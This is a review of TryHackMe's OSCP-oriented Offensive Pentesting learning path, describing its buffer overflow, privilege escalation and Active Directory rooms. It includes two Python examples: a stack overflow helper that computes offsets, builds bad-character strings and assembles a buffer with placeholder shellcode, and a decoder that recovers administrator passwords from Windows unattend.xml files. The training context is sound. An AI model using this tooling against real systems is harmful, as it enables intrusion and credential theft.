
TryHackMe – Offensive Pentesting Learning Path Review

Introduction

Offensive Pentesting is one of the learning paths available on the TryHackMe platform. It is primarily designed for students preparing for the Offensive Security Certified Professional (OSCP) certification exam.

It contains both rooms that step students through the individual exploitation steps and rooms that aim to simulate a black-box penetration test.

The Platform

TryHackMe is an online platform for learning cyber security and penetration testing through hands-on exercises and labs designed to teach practical skills.

I really like the layout of the platform and the way it functions. There are learning paths you can enroll in which aim to prepare you for a specific certification, such as CompTIA PenTest+, or for a specific area, such as Active Directory.

There are modules on the platform that aim to teach you a specific skill, for example cryptography, whereas others are simply capture-the-flag challenges. All modules and learning paths are made up of individual rooms that can also be joined on their own. A handy progress bar at the top of the page displays your progress through the current module/room.

You have the option either to use your own local Kali virtual machine or to boot up a Kali image and use it through the web platform.

Pros

  • The subscription is very affordable, at $10 a month.
  • The machines are not shared across other students.
  • An official forum is available to discuss rooms with other students.
  • Walkthroughs for every room are available in case you are stuck.
  • Some of the rooms do a great job of explaining why certain attacks are used, and some also include a video of the entire process.

Cons

  • I believe it would be an improvement if all questions had hints available that only unlock after a certain amount of time, and the same should apply to walkthroughs, to encourage students to do their own research rather than rely on hints or walkthroughs.
  • It would be handy if every room or module came with a PDF document containing useful notes from what was covered.
  • The learning path is a great concept and I think it should be used more, as a lot of students treat this platform as a learning environment rather than just a capture-the-flag playground, and since there is already a very large number of rooms available it shouldn’t be too hard to compile them into learning paths that prepare students for certifications.

Getting Started

This section should be fairly easy if you are already familiar with penetration testing or have experience with Hack The Box or similar platforms. It is still interesting nonetheless, as it teaches you how to use the TryHackMe platform and the basic concepts and steps of the penetration testing process, and walks you through a couple of machines where you will have to exploit known vulnerabilities in SMB and ProFTPD.

Advanced Exploitation

This section is where things get interesting, as there are nine different rooms in which you get to practice the full penetration testing cycle against different operating systems, services and applications.

The initial machines walk you through the entire process step by step, including a video walkthrough you can view as you complete the machine, whereas the others simulate a black-box scenario in which all you are given is the machine’s IP address and the scope of work.

This section includes common attack vectors such as SQL injection, brute force and remote file inclusion, and lets you explore and practice techniques such as packet analysis, SSH tunneling and privilege escalation.

I also liked the fact that the section covers quite a few privilege escalation vectors, such as SUID binaries, sudo-permitted scripts/binaries, kernel exploits, token impersonation, unquoted service paths, scheduled tasks and others, which is something courses often don’t cover enough.

Although it is nowhere near enough to prepare for the OSCP exam by itself, and the machines overall are not that difficult, it is definitely a great training resource, especially after you have finished your PWK labs and are looking for a new platform to keep your skills sharp.

Buffer Overflow Exploitation

This section felt a bit redundant to me, as I completed it after failing my first OSCP attempt and my stack buffer overflow knowledge was already good enough. Nevertheless, this is hands down one of the best buffer overflow preparation resources out there.

The first room walks you through every step of the buffer overflow exploitation process, in particular identifying the EIP offset, finding bad characters and choosing an EIP return address, which is really useful if you are new to buffer overflows. It also has a bunch of exercises that have you repeat these steps over and over again so that you become familiar with the entire exploitation process.
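To make those steps concrete, here is an added Python example (it is not the room's own material or any TryHackMe code) covering the mechanical parts of the process in one place: generating the unique cyclic pattern, turning the EIP value the debugger reports into an offset, building the bad-character test string, and assembling the final buffer. The return address 0x080414C3 and the INT3 shellcode are placeholders, not values from any room.

```python
# Added example (not the room's material): the mechanical steps of a classic
# 32-bit stack overflow in one place. The return address and shellcode used
# in __main__ are placeholders, not values from any TryHackMe room.
import string
import struct


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style pattern (Aa0Aa1Aa2...): every 4-byte window is unique
    for the first 20280 bytes, so the bytes that land in EIP identify the offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("a pattern longer than 20280 bytes would repeat")


def find_offset(pattern: bytes, eip_value: int) -> int:
    """Map the EIP value shown by the debugger (e.g. 0x6F43396E) back to the
    offset of the four pattern bytes that overwrote it. x86 is little-endian,
    so the register holds those bytes reversed; struct.pack('<I') undoes that."""
    needle = struct.pack("<I", eip_value)
    offset = pattern.find(needle)
    if offset == -1:
        raise ValueError("EIP value not found in the pattern; the crash came from elsewhere")
    return offset


def badchar_string(exclude=(0x00,)) -> bytes:
    """All bytes 0x01..0xFF except those already known to be mangled.
    Send it after the EIP overwrite, compare the stack in the debugger with
    this string, add the first byte that differs to `exclude`, and repeat
    until the copy is clean (0x00 is almost always bad for string functions)."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def build_exploit_buffer(offset: int, ret_addr: int, shellcode: bytes, nop_sled: int = 16) -> bytes:
    """padding | return address (little-endian, e.g. a JMP ESP gadget) | NOP sled | shellcode.
    The NOP sled absorbs the few bytes some shellcode decoders clobber right at ESP."""
    return b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_sled + shellcode


if __name__ == "__main__":
    # Crash the service with the pattern, read EIP in the debugger, then:
    pattern = cyclic_pattern(2000)
    eip_seen = int.from_bytes(pattern[300:304], "little")  # stand-in for the debugger's EIP value
    offset = find_offset(pattern, eip_seen)
    print(f"EIP overwritten at offset {offset}")
    print(f"bad-char test string: {len(badchar_string())} bytes")
    payload = build_exploit_buffer(offset, 0x080414C3, b"\xcc" * 8)  # placeholder JMP ESP + INT3 shellcode
    print(f"final buffer: {len(payload)} bytes")
```

The pattern and offset helpers replace pattern_create.rb / pattern_offset.rb for a 32-bit target; for a real target you still read EIP from the debugger, iterate the bad-character string until the stack copy matches, and pick a JMP ESP address whose bytes contain none of the bad characters.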

The subsequent rooms are simply buffer overflow boxes to exploit using a black-box approach. Some of them are known machines that have been ported to the THM platform (for example Brainpan 1 from VulnHub and dostackbufferoverflowgood), which makes it a lot easier to boot them up and interact with them than having to set up a VM locally.

The only problem I had with this section of the course, which is entirely down to me, is that the commands and steps used in the course are different from the ones I learned previously while doing the PWK course (admittedly the ones used in the THM course are easier to learn), and I was so used to the old ones that it was a bit hard for me at first to adapt to the new ones.

Active Directory

Even though Active Directory knowledge isn’t required for the OSCP certification (basic pivoting is covered in the course), it is an essential skill to have when performing penetration tests against Windows systems.

The first room teaches the basic theoretical concepts of AD, such as domain controllers, forests, users, groups, etc. This can be useful if you are not familiar with AD or need a refresher on the subject.

The next rooms cover the common enumeration and privilege escalation steps and basic Active Directory attacks such as ticket harvesting, password spraying/brute-forcing, Kerberoasting/AS-REP roasting, pass-the-ticket, etc. They explain in great detail, step by step, how these attacks are performed using common tools such as PowerView, Rubeus, Kerbrute, Impacket, BloodHound, Server Manager and Mimikatz.

Extra Credit

The first room of this section covers the basics of PowerShell required to enumerate a given domain controller/group, including listing users, finding hidden files, obtaining information about a command, manipulating command output (sorting, filtering, etc.), gathering networking information and active connections/ports, running processes, scheduled tasks and more.

The next room teaches you how to bypass AppLocker, a Windows feature that restricts which programs users can execute based on the program’s path, publisher or hash, and how to read the PowerShell command history, through which you gain access to a different user. You then use Kerberoasting to gain access to yet another user and run the PowerUp script, which reports that a base64-encoded administrator password is stored in the C:\Windows\Panther\Unattend\Unattended.xml file.
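As an added example (not PowerUp’s code and not part of the room), the following Python script shows what that PowerUp finding points at and how to recover the password offline once the answer file has been copied off the box. Windows Setup stores each password <Value> as base64 of the UTF-16LE password with the element name ("AdministratorPassword" or "Password") appended; hand-made lab files sometimes contain bare base64 or PlainText=true, so the decoder handles all three cases. The XML fixture and the passwords in it are constructed for this example.

```python
# Added example (not PowerUp's code, not the room's material): recover the
# administrator password an answer file stores, offline, once the file has
# been copied off the box. Windows Setup writes <Value> as
# base64(UTF-16LE(password + element name)); hand-made lab files sometimes
# store bare base64 or PlainText=true, so all three cases are handled.
import base64
import xml.etree.ElementTree as ET

# Element name -> suffix Windows Setup appends before encoding.
PASSWORD_ELEMENTS = {"AdministratorPassword": "AdministratorPassword", "Password": "Password"}


def decode_unattend_value(value_b64: str, suffix: str) -> str:
    """Undo Setup's obfuscation of a single <Value> element."""
    raw = base64.b64decode(value_b64)
    # Setup writes UTF-16LE, so every odd byte of an ASCII password is 0x00;
    # anything else is treated as plain base64(ASCII) from a hand-made file.
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        text = raw.decode("utf-16-le")
    else:
        text = raw.decode("utf-8", errors="replace")
    if text.endswith(suffix):
        text = text[: -len(suffix)]
    return text


def _local(tag: str) -> str:
    """Strip the urn:schemas-microsoft-com:unattend namespace from a tag."""
    return tag.rsplit("}", 1)[-1]


def extract_unattend_passwords(xml_text: str) -> list:
    """Return [(parent element, password element, cleartext)] for every
    password element that carries a <Value> child."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    found = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name not in PASSWORD_ELEMENTS:
            continue
        children = {_local(c.tag): (c.text or "").strip() for c in elem}
        if "Value" not in children:
            continue  # e.g. <Credentials><Password> holds a bare string, not a Value/PlainText pair
        if children.get("PlainText", "false").lower() == "true":
            cleartext = children["Value"]
        else:
            cleartext = decode_unattend_value(children["Value"], PASSWORD_ELEMENTS[name])
        found.append((_local(parents[elem].tag), name, cleartext))
    return found


def _setup_encode(secret: str, suffix: str) -> str:
    """Mirror of Setup's obfuscation; only used to build the constructed fixture below."""
    return base64.b64encode((secret + suffix).encode("utf-16-le")).decode("ascii")


# Constructed fixture shaped like C:\Windows\Panther\Unattend\Unattended.xml (not a real capture).
SAMPLE_UNATTEND_XML = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64">
      <UserAccounts>
        <AdministratorPassword>
          <Value>{admin}</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
      </UserAccounts>
      <AutoLogon>
        <Username>Administrator</Username>
        <Password>
          <Value>{autologon}</Value>
          <PlainText>false</PlainText>
        </Password>
      </AutoLogon>
    </component>
  </settings>
</unattend>
""".format(admin=_setup_encode("Summer2021", "AdministratorPassword"),
           autologon=_setup_encode("Autolog0n", "Password"))


if __name__ == "__main__":
    for parent, element, password in extract_unattend_passwords(SAMPLE_UNATTEND_XML):
        print(f"{parent}/{element}: {password}")
```

On a real engagement the same parser runs over every copy of the file you find (Panther, Panther\Unattend, sysprep directories), and the recovered credential is then tested with the usual tooling rather than assumed to still be valid.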

The next two rooms are black-box penetration tests which I found very interesting. One of them is Mr. Robot from VulnHub, which I had already done previously and which is already quite popular. The other is a Windows box where you find RDP credentials on a WordPress site and use a known vulnerability to gain system access.

Conclusion

This learning path was definitely one of the best resources in my OSCP preparation. I signed up for TryHackMe after failing my OSCP exam for the first time, and I wish I had done it earlier, as all of the rooms included in the path contain extremely useful information.